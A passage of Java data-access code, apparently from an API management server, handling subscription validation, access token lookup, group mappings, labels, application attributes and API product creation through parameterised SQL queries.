(!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED .equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return infoDTO; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return infoDTO; } final String API_PROVIDER = rs.getString("API_PROVIDER"); final String SUB_TIER = rs.getString("TIER_ID"); final String APP_TIER = rs.getString("APPLICATION_TIER"); infoDTO.setTier(SUB_TIER); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(API_PROVIDER); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(APP_TIER); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(API_PROVIDER); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, APP_TIER, SUB_TIER, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. 
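                    // At this point the list only carries the api_level_throttling_key placeholder added above;
                    // the policy id / condition id entries described in the preceding comment are not populated here.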
infoDTO.setThrottlingDataList(list);
                }
                infoDTO.setAuthorized(true);
                return infoDTO;
            }
            infoDTO.setAuthorized(false);
            infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN);
        } catch (SQLException e) {
            handleException("Exception occurred while validating Subscription.", e);
        } finally {
            try {
                conn.setAutoCommit(false);
            } catch (SQLException e) {
                log.error("Error occurred while fetching data: " + e.getMessage(), e);
            }
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return infoDTO;
    }

    /**
     * Returns a prepared statement after setting all the dynamic parameters. Dynamic parameters will be added in
     * the place of $params in the query string.
     *
     * @param conn               connection which will be used to create a prepared statement
     * @param query              dynamic query string which will be modified.
     * @param params             list of parameters
     * @param startingParamIndex index from which the parameter numbering will start.
     * @return the prepared statement with all dynamic parameters bound as strings
     * @throws SQLException
     */
    public PreparedStatement fillQueryParams(Connection conn, String query, String params[], int startingParamIndex)
            throws SQLException {
        String paramString = "";
        for (int i = 1; i <= params.length; i++) {
            if (i == params.length) {
                paramString = paramString + "?";
            } else {
                paramString = paramString + "?,";
            }
        }
        query = query.replace("$params", paramString);
        if (log.isDebugEnabled()) {
            log.debug("Prepared statement query: " + query);
        }
        PreparedStatement preparedStatement = conn.prepareStatement(query);
        for (int i = 0; i < params.length; i++) {
            preparedStatement.setString(startingParamIndex, params[i]);
            startingParamIndex++;
        }
        return preparedStatement;
    }

    /**
     * Returns true if the AM_APPLICATION_GROUP_MAPPING table exists in the AM database.
     *
     * @return true if the table exists, false otherwise
     */
    public boolean isGrpIdMappingTableExist() {
        String sql = "SELECT * FROM AM_APPLICATION_GROUP_MAPPING";
        Connection conn = null;
        PreparedStatement ps = null;
        ResultSet rs = null;
        try {
            conn = APIMgtDBUtil.getConnection();
            ps = conn.prepareStatement(sql);
            rs = ps.executeQuery();
        } catch (SQLException e) {
            log.info("AM_APPLICATION_GROUP_MAPPING :- " + e.getMessage(), e);
            return false;
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return true;
    }

    /**
     * Adds a new record in AM_APPLICATION_GROUP_MAPPING for each group.
     *
     * @param conn          open database connection to use
     * @param applicationId id of the application the groups belong to
     * @param groupIdString group id values separated by commas
     * @param tenant        tenant to which the group id mappings belong
     * @return true if the group id mappings were updated successfully
     * @throws APIManagementException
     */
    private boolean updateGroupIDMappings(Connection conn, int applicationId, String groupIdString, String tenant)
            throws APIManagementException {
        boolean updateSuccessful = false;
        PreparedStatement removeMigratedGroupIdsStatement = null;
        PreparedStatement deleteStatement = null;
        PreparedStatement insertStatement = null;
        String deleteQuery = SQLConstants.REMOVE_GROUP_ID_MAPPING_SQL;
        String insertQuery = SQLConstants.ADD_GROUP_ID_MAPPING_SQL;
        try {
            // Remove migrated Group ID information so that it can be replaced by updated Group ID's that are now
            // being saved.
This is done to ensure that there is no conflicting migrated Group ID data remaining removeMigratedGroupIdsStatement = conn.prepareStatement(SQLConstants.REMOVE_MIGRATED_GROUP_ID_SQL); removeMigratedGroupIdsStatement.setInt(1, applicationId); removeMigratedGroupIdsStatement.executeUpdate(); deleteStatement = conn.prepareStatement(deleteQuery); deleteStatement.setInt(1, applicationId); deleteStatement.executeUpdate(); if (!StringUtils.isEmpty(groupIdString)) { String[] groupIdArray = groupIdString.split(","); insertStatement = conn.prepareStatement(insertQuery); for (String group : groupIdArray) { insertStatement.setInt(1, applicationId); insertStatement.setString(2, group); insertStatement.setString(3, tenant); insertStatement.addBatch(); } insertStatement.executeBatch(); } updateSuccessful = true; } catch (SQLException e) { updateSuccessful = false; handleException("Failed to update GroupId mappings ", e); } finally { APIMgtDBUtil.closeAllConnections(removeMigratedGroupIdsStatement, null, null); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); APIMgtDBUtil.closeAllConnections(insertStatement, null, null); } return updateSuccessful; } /** * Fetches all the groups for a given application and creates a single string separated by comma * * @param applicationId * @return comma separated group Id String * @throws APIManagementException */ public String getGroupId(int applicationId) throws APIManagementException { String grpId = ""; ArrayList<String> grpIdList = new ArrayList<String>(); PreparedStatement preparedStatement = null; Connection conn = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_GROUP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { grpIdList.add(resultSet.getString("GROUP_ID")); } for (int i = 0; i < grpIdList.size(); i++) { if (i == grpIdList.size() - 1) { grpId = grpId + grpIdList.get(i); } else { grpId = grpId + grpIdList.get(i) + ","; } } } catch (SQLException e) { handleException("Failed to Retrieve GroupId for application " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, resultSet); } return grpId; } /** * Get access token information associated with the given consumer key. * * @param consumerKey The consumer key. * @return APIKey The access token information. 
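     * Scopes from all matching token rows are aggregated into the returned key's token scope.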
* @throws SQLException * @throws CryptoException */ public APIKey getAccessTokenInfoByConsumerKey(String consumerKey) throws SQLException, CryptoException, APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; String username = getUserIdFromConsumerKey(consumerKey); accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; String statement = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_SUFFIX; String oracleSQL = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_SUFFIX; String mySQL = "SELECT" + statement; String db2SQL = "SELECT" + statement; String msSQL = "SELECT " + statement; String postgreSQL = "SELECT * FROM (SELECT" + statement + ") AS TOKEN"; String accessToken; String sql; try { connection = APIMgtDBUtil.getConnection(); if (connection.getMetaData().getDriverName().contains("MySQL") || connection.getMetaData().getDriverName ().contains("H2")) { sql = mySQL; } else if (connection.getMetaData().getDatabaseProductName().contains("DB2")) { sql = db2SQL; } else if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData() .getDriverName().contains("Microsoft")) { sql = msSQL; } else if (connection.getMetaData().getDriverName().contains("PostgreSQL")) { sql = postgreSQL; } else { sql = oracleSQL; } preparedStatement = connection.prepareStatement(sql); preparedStatement.setString(1, consumerKey); preparedStatement.setString(2, APIConstants.ACCESS_TOKEN_USER_TYPE_APPLICATION); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { APIKey apiKey = new APIKey(); accessToken = APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN")); apiKey.setConsumerKey(consumerKey); String consumerSecret = resultSet.getString("CONSUMER_SECRET"); apiKey.setConsumerSecret(APIUtil.decryptToken(consumerSecret)); apiKey.setAccessToken(accessToken); apiKey.setValidityPeriod(resultSet.getLong("VALIDITY_PERIOD") / 1000); apiKey.setGrantTypes(resultSet.getString("GRANT_TYPES")); apiKey.setCallbackUrl(resultSet.getString("CALLBACK_URL")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = resultSet.getString("ACCESS_TOKEN"); do { String currentRowTokenString = resultSet.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(resultSet.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } } while (resultSet.next()); apiKey.setTokenScope(getScopeString(scopes)); return apiKey; } return null; } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } } /** * Returns the user id for the consumer key. * * @param consumerKey The consumer key. * @return String The user id. 
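     * Returns {@code null} when no user is associated with the given consumer key.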
*/ private String getUserIdFromConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String userId = null; String sqlQuery = SQLConstants.GET_USER_ID_FROM_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { userId = rs.getString("USER_ID"); } } catch (SQLException e) { handleException("Error when getting the user id for Consumer Key" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return userId; } /** * Get Subscribed APIs for an App. * * @param applicationName id of the application name * @return APISubscriptionInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APISubscriptionInfoDTO[] getSubscribedAPIsForAnApp(String userId, String applicationName) throws APIManagementException { List<APISubscriptionInfoDTO> apiSubscriptionInfoDTOS = new ArrayList<APISubscriptionInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); rs = ps.executeQuery(); while (rs.next()) { APISubscriptionInfoDTO infoDTO = new APISubscriptionInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setContext(rs.getString("API_CONTEXT")); infoDTO.setVersion(rs.getString("API_VERSION")); infoDTO.setSubscriptionTier(rs.getString("SP_TIER_ID")); apiSubscriptionInfoDTOS.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiSubscriptionInfoDTOS.toArray(new APISubscriptionInfoDTO[apiSubscriptionInfoDTOS.size()]); } public Application getApplicationByClientId(String clientId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_CLIENT_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, clientId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationId = rs.getString("APPLICATION_ID"); String applicationName = rs.getString("NAME"); String applicationOwner = rs.getString("CREATED_BY"); application = new Application(applicationId); application.setName(applicationName); application.setOwner(applicationOwner); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); application.setKeyType(rs.getString("KEY_TYPE")); if (multiGroupAppSharingEnabled) { 
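                    // When multi-group application sharing is enabled, the GROUP_ID column may be empty,
                    // so the group ids are loaded through getGroupId() as a fallback.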
                    if (application.getGroupId() == null || application.getGroupId().isEmpty()) {
                        application.setGroupId(getGroupId(application.getId()));
                    }
                }
            }
        } catch (SQLException e) {
            handleException("Error while obtaining details of the Application for client id " + clientId, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs);
        }
        return application;
    }

    /**
     * Returns the Label list for the tenant.
     *
     * @param tenantDomain The tenant domain.
     * @return List of labels.
     */
    public List<Label> getAllLabels(String tenantDomain) throws APIManagementException {
        List<Label> labelList = new ArrayList<>();
        try (Connection connection = APIMgtDBUtil.getConnection();
                PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_LABEL_BY_TENANT)) {
            try {
                connection.setAutoCommit(false);
                statement.setString(1, tenantDomain);
                try (ResultSet rs = statement.executeQuery()) {
                    while (rs.next()) {
                        String labelId = rs.getString("LABEL_ID");
                        String labelName = rs.getString("NAME");
                        String description = rs.getString("DESCRIPTION");
                        Label label = new Label();
                        label.setLabelId(labelId);
                        label.setName(labelName);
                        label.setDescription(description);
                        label.setAccessUrls(getAccessUrlList(connection, labelId));
                        labelList.add(label);
                    }
                }
                connection.commit();
            } catch (SQLException e) {
                connection.rollback();
                handleException("Failed to get Labels of " + tenantDomain, e);
            } finally {
                connection.setAutoCommit(true);
            }
        } catch (SQLException e) {
            handleException("Failed to get Labels of " + tenantDomain, e);
        }
        return labelList;
    }

    /**
     * Returns the access URL list for a label id.
     *
     * @param labelId label id.
     * @return List of access URLs.
     */
    private List<String> getAccessUrlList(Connection connection, String labelId) throws APIManagementException {
        List<String> hostList = new ArrayList<>();
        try (PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_URL_BY_LABEL_ID)) {
            statement.setString(1, labelId);
            try (ResultSet rs = statement.executeQuery()) {
                while (rs.next()) {
                    String host = rs.getString("ACCESS_URL");
                    hostList.add(host);
                }
            }
        } catch (SQLException e) {
            handleException("Failed to get label list: ", e);
        }
        return hostList;
    }

    /**
     * Adds a new Label for the tenant and returns it.
     *
     * @param tenantDomain The tenant domain.
     * @param label        label object.
     * @return the added label.
     */
    public Label addLabel(String tenantDomain, Label label) throws APIManagementException {
        String uuid = UUID.randomUUID().toString();
        label.setLabelId(uuid);
        try (Connection connection = APIMgtDBUtil.getConnection();
                PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_SQL)) {
            try {
                initialAutoCommit = connection.getAutoCommit();
                connection.setAutoCommit(false);
                statement.setString(1, uuid);
                statement.setString(2, label.getName());
                statement.setString(3, label.getDescription());
                statement.setString(4, tenantDomain);
                statement.executeUpdate();
                if (!label.getAccessUrls().isEmpty()) {
                    insertAccessUrlMappings(connection, uuid, label.getAccessUrls());
                }
                connection.commit();
            } catch (SQLException e) {
                connection.rollback();
                handleException("Failed to add label: " + uuid, e);
            } finally {
                APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit);
            }
        } catch (SQLException e) {
            handleException("Failed to add label: " + uuid, e);
        }
        return label;
    }

    /**
     * Inserts URLs into the label URL mapping table.
     *
     * @param uuid    label id.
     * @param urlList The list of url.
* @throws APIManagementException */ private void insertAccessUrlMappings(Connection connection, String uuid, List<String> urlList) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_URL_MAPPING_SQL)) { for (String accessUrl : urlList) { statement.setString(1, uuid); statement.setString(2, accessUrl); statement.addBatch(); } statement.executeBatch(); } catch (SQLException e) { handleException("Failed to add label url : " + uuid, e); } } /** * Delete label. * * @param labelUUID label id. * @throws APIManagementException */ public void deleteLabel(String labelUUID) throws APIManagementException { try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, labelUUID); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to delete label : " + labelUUID, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to delete label : " + labelUUID, e); } } /** * Delete label URL * * @param labelUUID label id. * @throws APIManagementException */ private void deleteAccessUrlMappings(Connection connection, String labelUUID) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_URL_MAPPING_SQL)) { statement.setString(1, labelUUID); statement.executeUpdate(); } catch (SQLException e) { handleException("Failed to delete label url : ", e); } } /** * Update the label. * * @param label label object. * @return labels. 
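     * Existing access URL mappings for the label are deleted and re-inserted from the supplied label's URL list.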
*/ public Label updateLabel(Label label) throws APIManagementException { List<String> accessURLs = label.getAccessUrls(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.UPDATE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, label.getName()); statement.setString(2, label.getDescription()); statement.setString(3, label.getLabelId()); deleteAccessUrlMappings(connection, label.getLabelId()); insertAccessUrlMappings(connection, label.getLabelId(), accessURLs); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to update label : ", e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to update label : ", e); } return label; } private void addApplicationAttributes(Connection conn, Map<String, String> attributes, int applicationId, int tenantId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; try { if(attributes != null) { ps = conn.prepareStatement(SQLConstants.ADD_APPLICATION_ATTRIBUTES_SQL); for (String key : attributes.keySet()) { ps.setInt(1, applicationId); ps.setString(2, key); ps.setString(3, attributes.get(key)); ps.setInt(4, tenantId); ps.addBatch(); } int[] update = ps.executeBatch(); } } catch (SQLException e) { handleException("Error in adding attributes of application with id: " + applicationId , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } /** * Get all attributes stored against an Application * * @param conn Database connection * @param applicationId * @throws APIManagementException */ public Map<String, String> getApplicationAttributes(Connection conn, int applicationId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Map<String, String> applicationAttributes = new HashMap<>(); try { ps = conn.prepareStatement(SQLConstants.GET_APPLICATION_ATTRIBUTES_BY_APPLICATION_ID); ps.setInt(1, applicationId); rs = ps.executeQuery(); while (rs.next()) { applicationAttributes.put(rs.getString("NAME"), rs.getString("VALUE")); } } catch (SQLException e) { handleException("Error when reading attributes of application with id: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationAttributes; } /** * Delete certain attribute stored against an Application * * @param attributeKey User defined key of attribute * @param applicationId * @throws APIManagementException */ public void deleteApplicationAttributes(String attributeKey, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_BY_ATTRIBUTE_NAME_SQL); ps.setString(1, attributeKey); ps.setInt(2, applicationId); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error in establishing SQL connection ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Add new attributes against an Application in API Store * * @param applicationAttributes Map of key, value pair of attributes * @param applicationId Id of Application against which attributes are getting stored * @param tenantId Id of tenant * @throws APIManagementException */ public void 
addApplicationAttributes(Map<String, String> applicationAttributes, int applicationId, int tenantId) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addApplicationAttributes(connection, applicationAttributes, applicationId, tenantId); connection.commit(); } catch (SQLException sqlException) { if (connection != null) { try { connection.rollback(); } catch (SQLException e) { log.error("Failed to rollback add application attributes ", e); } } handleException("Failed to add Application", sqlException); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } } /** * Converts all null values for THROTTLING_TIER in AM_API_URL_MAPPING table, to Unlimited. * This will be executed only during startup of the server. * * @throws APIManagementException */ public void convertNullThrottlingTiers() throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.FIX_NULL_THROTTLING_TIERS; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException( "Error occurred while converting NULL throttling tiers to Unlimited in AM_API_URL_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retrieves the Application which is corresponding to the given UUID String * * @param subscriberId subscriberId of the Application * @param applicationName name of the Application * @return * @throws APIManagementException */ public Application getApplicationBySubscriberIdAndName(int subscriberId, String applicationName) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_SUBSCRIBERID_AND_NAME_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, subscriberId); prepStmt.setString(2, applicationName); rs = prepStmt.executeQuery(); if (rs.next()) { String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(subscriberId); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? 
null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { application.setLastUpdatedTime(application.getCreatedTime()); } } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName + " of " + subscriberId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieve URI Templates for the given API * @param api API * @return Map of URITemplate with key as Method:resourcepath * @throws APIManagementException exception */ public Map<String, URITemplate> getURITemplatesForAPI(API api) throws APIManagementException { Map<String, URITemplate> templatesMap = new HashMap<String, URITemplate>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String query = "SELECT URL_PATTERN , URL_MAPPING_ID, HTTP_METHOD FROM AM_API API , AM_API_URL_MAPPING URL " + "WHERE API.API_ID = URL.API_ID AND API.API_NAME =? " + "AND API.API_VERSION=? AND API.API_PROVIDER=?"; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getId().getApiName()); prepStmt.setString(2, api.getId().getVersion()); prepStmt.setString(3, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { URITemplate template = new URITemplate(); String urlPattern = rs.getString("URL_PATTERN"); String httpMethod = rs.getString("HTTP_METHOD"); template.setHTTPVerb(httpMethod); template.setResourceURI(urlPattern); template.setId(rs.getInt("URL_MAPPING_ID")); //TODO populate others if needed templatesMap.put(httpMethod + ":" + urlPattern, template); } } catch (SQLException e) { handleException("Error while obtaining details of the URI Template for api " + api.getId() , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return templatesMap; } public void addAPIProduct(APIProduct apiproduct, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmtAddAPIProduct = null; PreparedStatement prepStmtAddResourceMapping = null; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddScopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; int productId = 0; int scopeId = 0; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //TODO move to constant :version? 
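// Flow of the statements below: insert the AM_API_PRODUCT row and read back its generated key,
// register a product-level scope, then batch the API-to-scope links, the product-to-URL-mapping rows
// and the scope-to-resource mappings for every resource of every member API before committing.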
String queryAddAPIProduct = "INSERT INTO " + "AM_API_PRODUCT(API_PRODUCT_PROVIDER,API_PRODUCT_NAME," + "DESCRIPTION, API_PRODUCT_TIER,CREATED_BY," + "VISIBILITY,SUBSCRIPTION_AVAILABILITY,UUID,TENANT_DOMAIN,STATE,API_PRODUCT_VERSION) " + "VALUES (?,?,?,?,?,?,?,?,?,?,?)"; prepStmtAddAPIProduct = connection.prepareStatement(queryAddAPIProduct, new String[]{"api_product_id"}); prepStmtAddAPIProduct.setString(1, apiproduct.getProvider()); prepStmtAddAPIProduct.setString(2, apiproduct.getName()); prepStmtAddAPIProduct.setString(3, apiproduct.getDescription()); prepStmtAddAPIProduct.setString(4, apiproduct.getProductTier()); prepStmtAddAPIProduct.setString(5, apiproduct.getProvider()); //TODO get the created user prepStmtAddAPIProduct.setString(6, apiproduct.getVisibility()); prepStmtAddAPIProduct.setString(7, apiproduct.getSubscriptionAvailability()); prepStmtAddAPIProduct.setString(8, apiproduct.getUuid()); prepStmtAddAPIProduct.setString(9, tenantDomain); prepStmtAddAPIProduct.setString(10, apiproduct.getState() == null? "CREATED" : apiproduct.getState()); //TODO move to constant prepStmtAddAPIProduct.setString(11, "0"); //TODO move to constant prepStmtAddAPIProduct.execute(); rs = prepStmtAddAPIProduct.getGeneratedKeys(); if (rs.next()) { productId = rs.getInt(1); } //breaks the flow if product is not added to the db correctly if(productId == 0) { throw new APIManagementException("Error while adding API product " + apiproduct.getUuid()); } //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiproduct.getName() + ":" +apiproduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[]{"scope_id"}); prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()){ scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException("Error while adding scope for API product : " + apiproduct.getUuid()); } productScope.setId(scopeId); //add scope - api mapping String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; prepStmtAddScopeLink = connection.prepareStatement(scopeLink); //TODO move to constant String queryAddResourceMapping = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + 